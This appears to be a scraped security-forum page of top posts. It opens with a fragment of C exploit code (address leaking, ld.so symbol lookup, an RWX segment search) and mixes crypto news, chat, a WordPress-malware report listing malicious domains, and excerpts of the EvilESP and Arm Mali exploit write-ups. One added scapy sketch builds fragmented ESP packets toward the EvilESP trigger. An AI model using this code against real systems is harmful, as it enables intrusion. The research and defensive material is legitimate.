    char prog[] = "./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    char hex[11];
    int fd[2], addr;

    /* truncate program name at correct length and create a hard link */
    prog[strlen(path)] = '\0';
    unlink(prog);
    link(argv[0], prog);

    /* open pipe to read program output */
    if (pipe(fd) == -1) {
        perror("pipe");
        exit(1);
    }

    switch(fork()) {
    case -1: /* cannot fork */
        perror("fork");
        exit(1);

    case 0: /* child */
        dup2(fd[1], 1);
        close(fd[0]);
        close(fd[1]);
        execve(prog, arg, env);
        perror("execve");
        exit(1);

    default: /* parent */
        close(fd[1]);
        read(fd[0], hex, sizeof(hex));
        break;
    }

    /* check address */
    if (!(addr = (int)strtoul(hex, (char **)NULL, 0))) {
        fprintf(stderr, "error: cannot read address from helper\n");
        exit(1);
    }

    return addr + strlen(arg[0]) + 1;
}

/*
 * search_ldso(): search for a symbol inside ld.so.1
 */
int search_ldso(char *sym)
{
    int addr;
    void *handle;
    Link_map *lm;

    /* open the executable object file */
    if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
        perror("dlopen");
        exit(1);
    }

    /* get dynamic load information */
    if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
        perror("dlinfo");
        exit(1);
    }

    /* search for the address of the symbol */
    if ((addr = (int)dlsym(handle, sym)) == NULL) {
        fprintf(stderr, "sorry, function %s() not found\n", sym);
        exit(1);
    }

    /* close the executable object file */
    dlclose(handle);

    return addr;
}

/*
 * search_rwx_mem(): search for an RWX memory segment valid for all
 * programs (typically, /usr/lib/ld.so.1) using the proc filesystem
 */
int search_rwx_mem(void)
{
    int fd;
    char tmp[16];
    prmap_t map;
    int addr = 0, addr_old;

    /* open the proc filesystem */
    sprintf(tmp,"/proc/%d/map", (int)getpid());
    if ((fd = open(tmp, O_RDONLY)) < 0) {
        fprintf(stderr, "can't open %s\n", tmp);
        exit(1);
    }

    /* search for the last RWX memory segment before stack (last - 1) */
    while (read(fd, &map, sizeof(map)))
        if (map.pr_vaddr)
            if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
                addr_old = addr;
                addr = map.pr_vaddr;
            }
    close(fd);

    /* add 4 to the exact address NUL bytes */
    if (!(addr_old & 0xff))
        addr_old |= 0x04;
    if (!(addr_old & 0xff00))
        addr_old |= 0x0400;

    return addr_old;
}

/*
 * set_val(): copy a dword inside a buffer (little endian)
 */
void set_val(char *buf, int pos, int val)
{
    buf[pos] = (val & 0x000000ff);
    buf[pos + 1] = (val & 0x0000ff00) >> 8;
    buf[pos + 2] = (val & 0x00ff0000) >> 16;
    buf[pos + 3] = (val & 0xff000000) >> 24;
}

Source
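The "IMPORTANT NOTE" in the header boils down to grepping a truss log for the last ParseColors() call. If you prefer scripting that step, here is a tiny Python sketch; it assumes the truss output format shown in the header comment and that the log was saved as OUT:

    import re

    # Pull the 1st argument of the last ParseColors() call from a truss log,
    # mirroring the "grep ParseColors OUT | tail -1" step in the header comment.
    last = None
    with open("OUT") as f:
        for line in f:
            if "ParseColors" in line:
                last = line

    m = re.search(r"ParseColors\((0x[0-9a-fA-F]+)", last or "")
    print(m.group(1) if m else "no ParseColors call found")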
    2 points
20. The funnier part is that this Kev guy wasn't even born when you were already using Solaris on UltraSPARC. 🤭
    2 points
21. I recommend Zitec. I worked there a few years ago and it was great. I've seen that it has grown enormously in recent years, so I can only assume it's even better now.
    2 points
22. So basically you're building a kind of ElasticSearch + FileBeat + Kibana, with a security focus for the requests?
    2 points
23. Hey kev, if you don't understand what this is about, why on earth are you cluttering up the guy's topic? It's like we're in a Muppets cartoon.
    2 points
24. Message to the ISP.
Me:
ISP:
Me:
ISP:
Sorry for the double post, I figured there's no notification for edits.
    2 points
  25. Customers of US bank Silvergate, which provides cryptocurrency services, have withdrawn over $8bn (£6.7bn) of their crypto-linked deposits. Around two-thirds of the bank's customers pulled their deposits in the final three months of 2022. The bank has sold $5.2bn in assets to cover the cost and remain liquid. It came as three US regulators warned banks that issuing or holding crypto was "highly likely to be inconsistent with safe and sound banking practices". Silvergate is a bank listed on the New York Stock Exchange, and is therefore regulated within the financial sector. It is one of a small handful of businesses within this sector that provides cryptocurrency services. The withdrawals followed the collapse of the FTX crypto exchange, which was once valued at $32bn before its bankruptcy filing in November. Former FTX boss Sam Bankman-Fried has pleaded not guilty to charges that he defrauded customers and investors. Prosecutors say as many as one million creditors may have lost their money. The case has shaken the entire crypto industry, sparking bankruptcy filings at other firms and declines in crypto values. Alan Lane, chief executive of Silvergate, said the bank was selling assets to cover the withdrawals by customers "in response to the rapid changes in the digital asset industry". Silvergate is the latest victim of the chilling "crypto winter" that's been whipping through the industry since last spring. The so-called crypto bank occupied a fairly unique position in the market acting as a bank for cryptocurrency companies which struggled to get banking services from traditional sources. One of its customers was the now bankrupt Alameda Research - owned by Sam Bankman-Fried who awaits trial in the US accused of fraud. That in itself is a blow for Silvergate but Bankman-Fried's downfall has delivered a bigger blow to the company - market confidence. Since Bankman-Fried's empire collapsed, investors large and small have been pulling their money out of crypto companies with billions transferred from companies that store crypto funds. So far the biggest companies in the space like Binance and Coinbase have survived the unprecedented withdrawals and it appears as though Silvergate is weathering the storm too for now but at a huge cost to its balance sheet. Silvergate was a small US bank before it entered the world of cryptocurrency, and went public in November 2019. At the market's peak in 2021, its shares had grown by more than 1,500%, in no small part due to the massive growth of crypto in this period. During this time it tried to launch its own stablecoin - a form of cryptocurrency which is directly tied to an asset such as gold, the US dollar or other cryptocurrencies. And in January 2022, Silvergate spent $182m to acquire the technology behind Meta's proposed Diem (formerly Libra) stablecoin that never saw the light of day. In a filing to the US Securities and Exchange Commission, the bank said it had sold debt to cover the withdrawals and had written off the Diem purchase, meaning it is no longer counted as an asset. It has also reduced its staff by 40% - around 200 people - and altogether the withdrawals have caused the bank to lose $718m, a total higher than its profit since 2013. Via bbc.com
    2 points
26. People who use WordPress should check their sites for unpatched plugins. Malware that exploits unpatched vulnerabilities in 30 different WordPress plugins has infected hundreds if not thousands of sites and may have been in active use for years, according to a writeup published last week. The Linux-based malware installs a backdoor that causes infected sites to redirect visitors to malicious sites, researchers from security firm Dr.Web said. It’s also able to disable event logging, go into standby mode, and shut itself down. It gets installed by exploiting already-patched vulnerabilities in plugins that website owners use to add functionality like live chat or metrics-reporting to the core WordPress content management system. Searches such as this one indicate that more than 1,300 sites contain the JavaScript that powers the backdoor. It’s possible that some of those sites have removed the malicious code since the last scan. Still, it provides an indication of the reach of the malware.

The plugins exploited include:

WP Live Chat Support Plugin
WordPress – Yuzo Related Posts
Yellow Pencil Visual Theme Customizer Plugin
Easysmtp
WP GDPR Compliance Plugin
Newspaper Theme on WordPress Access Control (vulnerability CVE-2016-10972)
Thim Core
Google Code Inserter
Total Donations Plugin
Post Custom Templates Lite
WP Quick Booking Manager
Facebook Live Chat by Zotabox
Blog Designer WordPress Plugin
WordPress Ultimate FAQ (vulnerabilities CVE-2019-17232 and CVE-2019-17233)
WP-Matomo Integration (WP-Piwik)
WordPress ND Shortcodes For Visual Composer
WP Live Chat
Coming Soon Page and Maintenance Mode
Hybrid
Brizy WordPress Plugin
FV Flowplayer Video Player
WooCommerce
WordPress Coming Soon Page
WordPress theme OneTone
Simple Fields WordPress Plugin
WordPress Delucks SEO plugin
Poll, Survey, Form & Quiz Maker by OpinionStage
Social Metrics Tracker
WPeMatico RSS Feed Fetcher
Rich Reviews plugin

“If one or more vulnerabilities are successfully exploited, the targeted page is injected with a malicious JavaScript that is downloaded from a remote server,” the Dr.Web writeup explained. “With that, the injection is done in such a way that when the infected page is loaded, this JavaScript will be initiated first—regardless of the original contents of the page. At this point, whenever users click anywhere on the infected page, they will be transferred to the website the attackers need users to go to.”

The JavaScript contains links to a variety of malicious domains, including:

lobbydesires[.]com
letsmakeparty3[.]ga
deliverygoodstrategies[.]com
gabriellalovecats[.]com
css[.]digestcolect[.]com
clon[.]collectfasttracks[.]com
Count[.]trackstatisticsss[.]com

The screenshot below shows how the JavaScript appears in the page source of the infected site: The researchers found two versions of the backdoor: Linux.BackDoor.WordPressExploit.1 and Linux.BackDoor.WordPressExploit.2. They said the malware may have been in use for three years. WordPress plugins have long been a common means for infecting sites. While the security of the main application is fairly robust, many plugins are riddled with vulnerabilities that can lead to infection. Criminals use infected sites to redirect visitors to sites used for phishing, ad fraud, and distributing malware. People running WordPress sites should ensure that they’re using the most current versions of the main software as well as any plugins. They should prioritize updating any of the plugins listed above.

Source
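If you want to quickly check whether a rendered page references any of the indicator domains listed above, a minimal Python sketch (the de-fanged "[.]" restored to "."; a convenience check, not an official detection tool):

    import urllib.request

    # Indicator domains from the Dr.Web writeup, de-fanged brackets removed.
    INDICATORS = [
        "lobbydesires.com", "letsmakeparty3.ga", "deliverygoodstrategies.com",
        "gabriellalovecats.com", "css.digestcolect.com",
        "clon.collectfasttracks.com", "count.trackstatisticsss.com",
    ]

    def check(url):
        html = urllib.request.urlopen(url, timeout=10).read()
        html = html.decode("utf-8", "replace").lower()
        return [d for d in INDICATORS if d in html]

    print(check("https://example.com/"))  # empty list means no hits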
    2 points
27. Thanks for the feedback! The reason we don't offer the WAF part is purely a business one. You're right, a lot of clients want you to do the filtering, but they're also the ones telling you: "we don't want you to have control over the data we receive or send", and doing WAF without control over the data isn't possible. For the DDoS protection part, our current goal is to detect attacks, not to block them. When we talk about a DDoS attack, protection happens very little at the logical level and very much at the physical level (being able to handle more traffic through better network infrastructure) or by having integrations/automations/easy access to the internet providers' networks. And none of those things are in our scope because, first, infrastructure needs money (and that's independent of me) and, second, nobody will grant you the ISP side. For the DLP part - same story - we need control (and the client won't give control). And here I can give two simple examples: 1. There's no way for me to notice whether you have a data leakage in your traffic unless you allow me to install an SSL proxy in your infrastructure and analyze it (which nobody allows). 2. Let's assume we leave encryption aside and everything is unencrypted (an FTP service). If I see you trying to copy a lot of files and I block you, you as a client come and tell me: sure, but I can't allow you to block my traffic, because I don't know whether your stuff is affecting my production or not. The monitoring/alerting part we do offer to some extent and can cover without problems. The response time part - we don't generate incidents; we could do that, we could also investigate and resolve them, but again, it's not in our business model. Regarding Imperva, you're right, part of what we do is also offered by maybe 50 other companies, but there are things we offer that others don't have, such as the live traffic + detection part and the machine learning / behaviour analysis personalized to each site (I don't know of a vendor that does that). The roadmap - we have a lot planned. For now there are just two of us and we're quite limited on time, but most of the things listed here we will cover sooner or later (or touch on tangentially). The services' limitations: that's what we're trying to find out too (hence the initial post). We had scaling problems depending on a site's traffic, but those were solved and we're ready for new challenges. Thanks again for the feedback!
    2 points
28. Nice project, and I understand it took a lot of work, but how is it on the defense side? I haven't read anything except that there's no WAF, so then it's only good for the analysis part. Clients' expectation then becomes that a product should have everything, including WAF, DDoS protection, DLP, monitoring/alerting, geo blocking, response time (tech support) that's immediate when there are problems, etc. Many clients are trying to reduce the number of platforms, not add to it. There are already many products that do all or many of the things mentioned, like the ones from Imperva. What's the future of the platform then - the roadmap? What are the limitations of the services that are already functional? Good luck going forward.
    2 points
  29. North Korea-linked hackers stole $1.7bn of cryptocurrency in 2022 North Korea-backed hackers stole $1.7bn (£1.4bn) of crypto in 2022, says blockchain analysis firm Chainalysis. This nearly quadruples the country's previous record for cryptocurrency theft - $429m in 2021. The loot also made up 44% of the $3.8bn stolen in crypto hacks last year, which the firm called "the biggest year ever for crypto hacking". Experts have said the country, facing heavy sanctions, is turning to crypto theft to fund its nuclear arsenal. North Korea has conducted six nuclear tests and analysts expect the seventh one this year, as the country accelerates its nuclear weapons programme under leader Kim Jong-un. Last year, Pyongyang launched a record number of ballistic and other missiles. This is despite the country's struggling economy. These hackers typically launder crypto through "mixers", which blend cryptocurrencies from various users to obfuscate the origins of the funds, the firm said. Other experts have also said that North Korea launders stolen crypto through brokers in China and non-fungible tokens (NFTs). Last month, the FBI confirmed that North Korea-affiliated Lazarus Group was responsible for a $100m crypto heist on a blockchain network called Horizon bridge last year. Overall, decentralised finance protocols, or DeFi, accounted for over 82% of cryptocurrency stolen in 2022, Chainalysis' report said. DeFi users know what will happen to their funds when they use them because smart contract codes governing these protocols are publicly accessible by default. But this transparency also makes DeFi particularly attractive to hackers, who can scan the codes for vulnerabilities and "strike at the perfect time" to maximise their loot, according to the report. David Schwed, chief operating officer at blockchain security firm Halborn, noted that DeFi developers "prioritise growth over all else", and funds that could be used to enhance security are often directed instead to rewards, in order to attract users. DeFi developers can take a leaf from traditional financial institutions in making their platforms more secure, Mr Schwed said. For instance, they can simulate different hacking scenarios to test their protocols, or design mechanisms to pause or halt transactions when suspicious activity is detected. "You don't need to move as slow as a bank, but you can borrow from what banks do," he said. Via bbc.com
    1 point
30. Nice, in theory you could have taken it all the way to RCE, but they've probably kept adding mitigations. Let us know how much they pay for it.
    1 point
31. Monzo, Monese, these two-bit ones... instant, including Transilvania. Revolut....
    1 point
  32. Dissecting and Exploiting TCP/IP RCE Vulnerability “EvilESP” Software Vulnerabilities January 20, 2023 By Valentina Palmiotti 10 min read September’s Patch Tuesday unveiled a critical remote vulnerability in tcpip.sys, CVE-2022-34718. The advisory from Microsoft reads: “An unauthenticated attacker could send a specially crafted IPv6 packet to a Windows node where IPsec is enabled, which could enable a remote code execution exploitation on that machine.” Pure remote vulnerabilities usually yield a lot of interest, but even over a month after the patch, no additional information outside of Microsoft’s advisory had been publicly published. From my side, it had been a long time since I attempted to do a binary patch diff analysis, so I thought this would be a good bug to do root cause analysis and craft a proof-of-concept (PoC) for a blog post. On October 21 of last year, I posted an exploit demo and root cause analysis of the bug. Shortly thereafter a blog post and PoC was published by Numen Cyber Labs on the vulnerability, using a different exploitation method than I used in my demo. In this blog — my follow-up article to my exploit video — I include an in-depth explanation of the reverse engineering of the bug and correct some inaccuracies I found in the Numen Cyber Labs blog. In the following sections, I cover reverse engineering the patch for CVE-2022-34718, the affected protocols, identifying the bug, and reproducing it. I’ll outline setting up a test environment and write an exploit to trigger the bug and cause a Denial of Service (DoS). Finally, I’ll look at exploit primitives and outline the next steps to turn the primitives into remote code execution (RCE). Patch Diffing Microsoft’s advisory does not contain any specific details of the vulnerability except that it is contained in the TCP/IP driver and requires IPsec to be enabled. In order to identify the specific cause of the vulnerability, we’ll compare the patched binary to the pre-patch binary and try to extract the “diff”(erence) using a tool called BinDiff. I used Winbindex to obtain two versions of tcpip.sys: one right before the patch and one right after, both for the same version of Windows. Getting sequential versions of the binaries is important, as even using versions a few updates apart can introduce noise from differences that are not related to the patch, and cause you to waste time while doing your analysis. Winbindex has made patch analysis easier than ever, as you can obtain any Windows binary beginning from Windows 10. I loaded both of the files in Ghidra, applied the Program Database (pdb) files, and ran auto analysis (checking aggressive instruction finder works best). Afterward, the files can be exported into a BinExport format using the extension BinExport for Ghidra. The files can then be loaded into BinDiff to create a diff and start analyzing their differences: BinDiff summary comparing the pre- and post-patch binaries BinDiff works by matching functions in the binaries being compared using various algorithms. In this case there, we have applied function symbol information from Microsoft, so all the functions can be matched by name. List of matched functions sorted by similarity Above we see there are only two functions that have a similarity less than 100%. The two functions that were changed by the patch are IppReceiveEsp and Ipv6pReassembleDatagram. Vulnerability Root Cause Analysis Previous research shows the Ipv6pReassembleDatagram function handles reassembling Ipv6 fragmented packets. 
The function name IppReceiveEsp seems to indicate this function handles the receiving of IPsec ESP packets. Before diving into the patch, I’ll briefly cover Ipv6 fragmentation and IPsec. Having a general understanding of these packet structures will help when attempting to reverse engineer the patch. IPv6 Fragmentation: An IPv6 packet can be divided into fragments with each fragment sent as a separate packet. Once all of the fragments reach the destination, the receiver reassembles them to form the original packet. The diagram below illustrates the fragmentation: Illustration of Ipv6 fragmentation According to the RFC, fragmentation is implemented via an Extension Header called the Fragment header, which has the following format: Ipv6 Fragment Header format Where the Next Header field is the type of header present in the fragmented data. IPsec (ESP): IPsec is a group of protocols that are used together to set up encrypted connections. It’s often used to set up Virtual Private Networks (VPNs). From the first part of patch analysis, we know the bug is related to the processing of ESP packets, so we’ll focus on the Encapsulating Security Payload (ESP) protocol. As the name suggests, the ESP protocol encrypts (encapsulates) the contents of a packet. There are two modes: in tunnel mode, a copy of IP header is contained in the encrypted payload, and in transport mode where only the transport layer portion of the packet is encrypted. Like IPv6 fragmentation, ESP is implemented as an extension header. According to the RFC, an ESP packet is formatted as follows: Top Level Format of an ESP Packet Where Security Parameters Index (SPI) and Sequence Number fields comprise the ESP extension header, and the fields between and including Payload Data and Next Header are encrypted. The Next Header field describes the header contained in Payload Data. Now with a primer of Ipv6 Fragmentation and IPsec ESP, we can continue the patch diff analysis by analyzing the two functions we found were patched. Ipv6pReassembleDatagram Comparing the side by side of the function graphs, we can see that a single new code block has been introduced into the patched function: Side-by-side comparison of the pre- and post-patch function graphs of Ipv6ReassembleDatagram Let’s take a closer look at the block: New code block in the patched function The new code block is doing a comparison of two unsigned integers (in registers EAX and EDX) and jumping to a block if one value is less than the other. Let’s take a look at that destination block: The target code has an unconditional call to the function IppDeleteFromReassemblySet. Taking a guess from the name of this function, this block seems to be for error handling. We can intuit that the new code that was added is some sort of bounds check, and there has been a “goto error” line inserted into the code, if the check fails. With this bit of insight, we can perform static analysis in a decompiler. 0vercl0ck previously published a blog post doing vulnerability analysis on a different Ipv6 vulnerability and went deep into the reverse engineering of tcpip.sys. From this work and some additional reverse engineering, I was able to fill in structure definitions for the undocumented Packet_t and Reassembly_t objects, as well as identify a couple of crucial local variable assignments. Decompilation output of Ipv6ReassembleDatagram In the above code snippet, the pink box surrounds the new code added by the patch. 
Reassembly->nextheader_offset contains the byte offset of the next_header field in the Ipv6 fragmentation header. The bounds check compares next_header_offset to the length of the header buffer. On line 29, HeaderBufferLen is used to allocate a buffer and on line 35, Reassembly->nextheader_offset is used to index and copy into the allocated buffer. Because this check was added, we now know there was a condition that allows nextheader_offset to exceed the header buffer length. We’ll move on to the second patched function to seek more answers.

IppReceiveEsp

Looking at the function graph side by side in the BinDiff workspace, we can identify some new code blocks introduced into the patched function: Side-by-side comparison of the pre- and post-patch function graphs of IppReceiveEsp

The image below shows the decompilation of the function IppReceiveEsp, with a pink box surrounding the new code added by the patch. Decompilation output of IppReceiveESP

Here, a new check was added to examine the Next Header field of the ESP packet. The Next Header field identifies the header of the decrypted ESP packet. Recall that a Next Header value can correspond to an upper layer protocol (such as TCP or UDP) or an extension header (such as fragmentation header or routing header). If the value in NextHeader is 0, 0x2B, or 0x2C, IppDiscardReceivedPackets is called and the error code is set to STATUS_DATA_NOT_ACCEPTED. These values correspond to IPv6 Hop-by-Hop Option, Routing Header for Ipv6, and Fragment Header for IPv6, respectively. Referring back to the ESP RFC, it states: “In the IPv6 context, ESP is viewed as an end-to-end payload, and thus should appear after hop-by-hop, routing, and fragmentation extension headers.” Now the problem becomes clear. If a header of these types is contained within an ESP payload, it violates the RFC of the protocol, and the packet will be discarded.

Putting It All Together

Now that we have diagnosed the patches in two different functions, we can figure out how they are related. In the first function Ipv6ReassembleDatagram, we determined the fix was for a buffer overflow. Decompilation output of Ipv6ReassembleDatagram

Recall that the size of the victim buffer is calculated as the size of the extension headers, plus the size of an Ipv6 header (Line 10 above). Now refer back to the patch that was inserted (Line 16). Reassembly->nextheader_offset refers to the offset of the Next Header value of the buffer holding the data for the fragment. Now refer back to the structure of an ESP packet: Top Level Format of an ESP Packet

Notice that the Next Header field comes *after* Payload Data. This means that Reassembly->nextheader_offset will include the size of the Payload Data, which is controlled by the size of the data, and can be much greater than the size of the extension headers. The expected location of the Next Header field is inside an extension header or Ipv6 header. In an ESP packet, it is not inside the header, since it is actually contained in the encrypted portion of the packet. Illustrated root cause of CVE-2022-34718

Now refer back to line 35 of Ipv6ReassembleDatagram; this is where an out of bounds 1 byte write occurs (the size and value of NextHeader).

Reproducing the Bug

We now know the bug can be triggered by sending an IPv6 fragmented datagram via IPsec ESP packets. The next question to answer: how will the victim be able to decrypt the ESP packets?
To answer this question, I first tried to send packets to a victim containing an ESP Header with junk data and put a breakpoint on to the vulnerable IppReceiveEsp function, to see if the function could be reached. The breakpoint was hit, but the internal function I thought did the decrypting IppReceiveEspNbl, returned an error, so the vulnerable code was never reached. I further reverse engineered IppReceiveEspNbl and worked my way through to find the point of failure. This is where I learned that in order to successfully decrypt an ESP packet, a security association must be established. A security association consists of a shared state, primarily cryptographic keys and parameters, maintained between two endpoints to secure traffic between them. In simple terms, a security association defines how a host will encrypt/decrypt/authenticate traffic coming from/going to another host. Security associations can be established via the Internet Key Exchange (IKE) or Authenticated IP Protocol. In essence, we need a way to establish a security association with the victim, so that it knows how to decrypt the incoming data from the attacker. For testing purposes, instead of implementing IKE, I decided to create a security association on the victim manually. This can be done using the Windows Filtering Platform WinAPI (WFP). Numen’s blog post stated that it’s not possible to use WFP for secret key management. However, that is incorrect and by modifying sample code provided by Microsoft, it’s possible to set a symmetric key that the victim will use to decrypt ESP packets coming from the attacker IP. Exploitation Now that the victim knows how to decrypt ESP traffic from us (the attacker) we can build malformed encrypted ESP packets using scapy. Using scapy we can send packets at the IP layer. The exploitation process is simple: CVE-2022-34718 PoC I create a set of fragmented packets from an ICMPv6 Echo request. Then for each fragment, they are encrypted into an ESP layer before sending. Primitive From the root cause analysis diagram pictured above, we know our primitive gives us an out of bounds write at offset = sizeof(Payload Data) + sizeof(Padding) + sizeof(Padding Length) The value of the write is controllable via the value of the Next Header field. I set this value on line 36 in my exploit above (0x41 ). Denial of Service (DoS) Corrupting just one byte into a random offset of the NetIoProtocolHeader2 pool (where the target buffer is allocated), usually does not immediately cause a crash. We can reliably crash the target by inserting additional headers within the fragmented message to parse, or by repeatedly pinging the target after corrupting a large portion of the pool. Limitations to Overcome For RCE offset is attacker controlled, however according to the ESP RFC, padding is required such that the Integrity Check Value (ICV) field (if present) is aligned on a 4-byte boundary. Because sizeof(Padding Length) = sizeof(Next Header) = 1, sizeof(Payload Data) + sizeof(Padding) + 2 must be 4 byte aligned. And therefore: offset = 4n - 1 Where n can be any positive integer, constrained by the fact the payload data and padding must fit within a single packet and is therefore limited by MTU (frame size). This is problematic because it means full pointers cannot be overwritten. This is limiting, but not necessarily prohibitive; we can still overwrite the offset of an address in an object, a size, a reference counter, etc. 
The possibilities available to us depend on what objects can be sprayed in the kernel pool where the victim headerBuff is allocated. Heap Grooming Research The affected kernel pool in WinDbg The victim out of bounds buffer is allocated in the NetIoProtocolHeader2 pool. The first steps in heap grooming research are: examine the type of objects allocated in this pool, what is contained in them, how they are used, and how the objects are allocated/freed. This will allow us to examine how the write primitive can be used to obtain a leak or build a stronger primitive. We are not necessarily restricted to NetIoProtocolHeader2. However, because the position of the victim out-of-bounds buffer cannot be predicted, and the address of surrounding pools is randomized, targeting other pools seems challenging. Demo Watch the demo exploiting CVE-2022-34718 ‘EvilESP’ for DoS below: Takeaways When laid out like this, the bug seems pretty simple. However, it took several long days of reverse engineering and learning about various networking stacks and protocols to understand the full picture and write a DoS exploit. Many researchers will say that configuring the setup and understanding the environment is the most time-consuming and tedious part of the process, and this was no exception. I am very glad that I decided to do this short project; I understand Ipv6, IPsec, and fragmentation much better now. To learn how IBM Security X-Force can help you with offensive security services, schedule a no-cost consult meeting here: IBM X-Force Scheduler. If you are experiencing cybersecurity issues or an incident, contact X-Force to help: U.S. hotline 1-888-241-9812 | Global hotline (+001) 312-212-8034. References https://www.rfc-editor.org/rfc/rfc8200#section-4.5 https://blog.quarkslab.com/analysis-of-a-windows-ipv6-fragmentation-vulnerability-cve-2021-24086.html https://doar-e.github.io/blog/2021/04/15/reverse-engineering-tcpipsys-mechanics-of-a-packet-of-the-death-cve-2021-24086/#diffing-microsoft-patches-in-2021 https://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml https://datatracker.ietf.org/doc/html/rfc4303 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34718 Sursa: https://securityintelligence.com/posts/dissecting-exploiting-tcp-ip-rce-vulnerability-evilesp/
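To make the article's packet-building steps more concrete, here is a rough scapy sketch of the two building blocks the PoC combines: IPv6 fragmentation and ESP encryption. Addresses, SPI and key are placeholder assumptions that would have to match the victim's security association, and scapy's transport-mode encrypt builds RFC-conformant packets, so treat this as a starting point for experimentation rather than the malformed PoC trigger itself:

    from scapy.all import IPv6, ICMPv6EchoRequest, fragment6, send
    from scapy.layers.inet6 import IPv6ExtHdrFragment
    from scapy.layers.ipsec import SecurityAssociation, ESP

    # Placeholder security association: SPI, algorithm and key must match
    # whatever the victim was configured with (e.g. via WFP, as described).
    sa = SecurityAssociation(ESP, spi=0x1000,
                             crypt_algo="AES-CBC", crypt_key=b"A" * 16)

    # An oversized ICMPv6 echo that needs fragmenting; addresses are placeholders.
    pkt = IPv6(src="fd00::1", dst="fd00::2") / IPv6ExtHdrFragment() / \
          ICMPv6EchoRequest(data=b"B" * 4000)

    for frag in fragment6(pkt, 1280):   # split at a 1280-byte MTU
        send(sa.encrypt(frag))          # wrap each fragment in ESP and send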
    1 point
  33. Pwning the all Google phone with a non-Google bug It turns out that the first “all Google” phone includes a non-Google bug. Learn about the details of CVE-2022-38181, a vulnerability in the Arm Mali GPU. Join me on my journey through reporting the vulnerability to the Android security team, and the exploit that used this vulnerability to gain arbitrary kernel code execution and root on a Pixel 6 from an Android app. Author Man Yue Mo January 23, 2023 The “not-Google” bug in the “all-Google” phone The year is 2021 A.D. The first “all Google” phone, the Pixel 6 series, made entirely by Google, is launched. Well not entirely… One small GPU chip still holds out. And life is not easy for security researchers who audit the fortified camps of Midgard, Bifrost, and Valhall.1 An unfortunate security researcher was about to learn this the hard way as he wandered into the Arm Mali regime: CVE-2022-38181 In this post I’ll cover the details of CVE-2022-38181, a vulnerability in the Arm Mali GPU that I reported to the Android security team on 2022-07-12 along with a proof-of-concept exploit that used this vulnerability to gain arbitrary kernel code execution and root privileges on a Pixel 6 from an Android app. The bug was assigned bug ID 238770628. After initially rating it as a High-severity vulnerability, the Android security team later decided to reclassify it as a “Won’t fix” and they passed my report to Arm’s security team. I was eventually able to get in touch with Arm’s security team to independently follow up on the issue. The Arm security team were very helpful throughout and released a public patch in version r40p0 of the driver on 2022-10-07 to address the issue, which was considerably quicker than similar disclosures that I had in the past on Android. A coordinated disclosure date of around mid-November was also agreed to allow time for users to apply the patch. However, I was unable to connect with the Android security team and the bug was quietly fixed in the January update on the Pixel devices as bug 259695958. Neither the CVE ID, nor the bug ID (the original 238770628 and the new 259695958) were mentioned in the security bulletin. Our advisory, including the disclosure timeline, can be found here. The Arm Mali GPU The Arm Mali GPU is a “device-specific” hardware component which can be integrated into various devices, ranging from Android phones to smart TV boxes. For example, all of the international versions of the Samsung S series phones, up to S21 use the Mali GPU, as well as the Pixel 6 series. For additional examples, see “implementations” in Mali(GPU) Wikipedia entry for some specific devices that use the Mali GPU. As explained in my other post, GPU drivers on Android are a very attractive target for an attacker, as they can be reached directly from the untrusted app domain and most Android devices use either Qualcomm’s Adreno GPU, or the Arm Mali GPU, meaning that relatively few bugs can cover a large number of devices. In fact, of the seven Android 0-days that were detected as exploited in the wild in 2021– five targeted GPU drivers. Another more recent bug that was exploited in the wild – CVE-2021-39793, disclosed in March 2022 – also targeted a GPU driver. Together, of these six bugs that were exploited in the wild that targeted Android GPU drivers, three bugs targeted the Qualcomm GPU, while the other three targeted the Arm Mali GPU. 
Due to the complexity involved in managing memory sharing between user space applications and the GPU, many of the vulnerabilities in the Arm Mali GPU involve the memory management code. The current vulnerability is another example of this, and involves a special type of GPU memory: the JIT memory. Contrary to the name, JIT memory does not seem to be related to JIT compiled code, as it is created as non-executable memory. Instead, it seems to be used for memory caches, managed by the GPU kernel driver, that can readily be shared with user applications and returned to the kernel when memory pressure arises. Many other types of GPU memory are created directly using ioctl calls like KBASE_IOCTL_MEM_IMPORT. (See, for example, the section “Memory management in the Mali kernel driver” in my previous post.) This, however, is not the case for JIT memory regions, which are created by submitting a special GPU instruction using the KBASE_IOCTL_JOB_SUBMIT ioctl call. The KBASE_IOCTL_JOB_SUBMIT ioctl can be used to submit a “job chain” to the GPU for processing. Each job chain is basically a list of jobs, which are opaque data structures that contain job headers, followed by payloads that contain the specific instructions. For an example, see the Writing to GPU memory section in my previous post. While the KBASE_IOCTL_JOB_SUBMIT is normally used for sending instructions to the GPU itself, there are also some jobs that are implemented in the kernel and run on the host (CPU) instead. These are the software jobs (“softjobs”) and among them are jobs that instruct the kernel to allocate and free JIT memory (BASE_JD_REQ_SOFT_JIT_ALLOC and BASE_JD_REQ_SOFT_JIT_FREE).

The life cycle of JIT memory

While KBASE_IOCTL_JOB_SUBMIT is a general purpose ioctl call and contains code paths that are responsible for handling different types of GPU jobs, the BASE_JD_REQ_SOFT_JIT_ALLOC job essentially calls kbase_jit_allocate_process, which then calls kbase_jit_allocate to create a JIT memory region. To understand the lifetime and usage of JIT memory, let me first introduce a few different concepts. When using the Mali GPU driver, a user app first needs to create and initialize a kbase_context kernel object. This involves the user app opening the driver file and using the resulting file descriptor to make a series of ioctl calls. A kbase_context object is responsible for managing resources for each driver file that is opened and is unique for each file handle. In particular, it has three list_head fields that are responsible for managing JIT memory: the jit_active_head, the jit_pool_head, and the jit_destroy_head. As their names suggest, jit_active_head contains memory that is still in use by the user application, jit_pool_head contains memory regions that are not in use, and jit_destroy_head contains memory regions that are pending to be freed and returned to the kernel. Although both jit_pool_head and jit_destroy_head are used to manage JIT regions that are free, jit_pool_head acts like a memory pool and contains JIT regions that are intended to be reused when new JIT regions are allocated, while jit_destroy_head contains regions that are going to be returned to the kernel. When kbase_jit_allocate is called, it’ll first try to find a suitable region in the jit_pool_head:

    if (info->usage_id != 0)
        /* First scan for an allocation with the same usage ID */
        reg = find_reasonable_region(info, &kctx->jit_pool_head, false);
    ...
    if (reg) {
        ...
        list_move(&reg->jit_node, &kctx->jit_active_head);

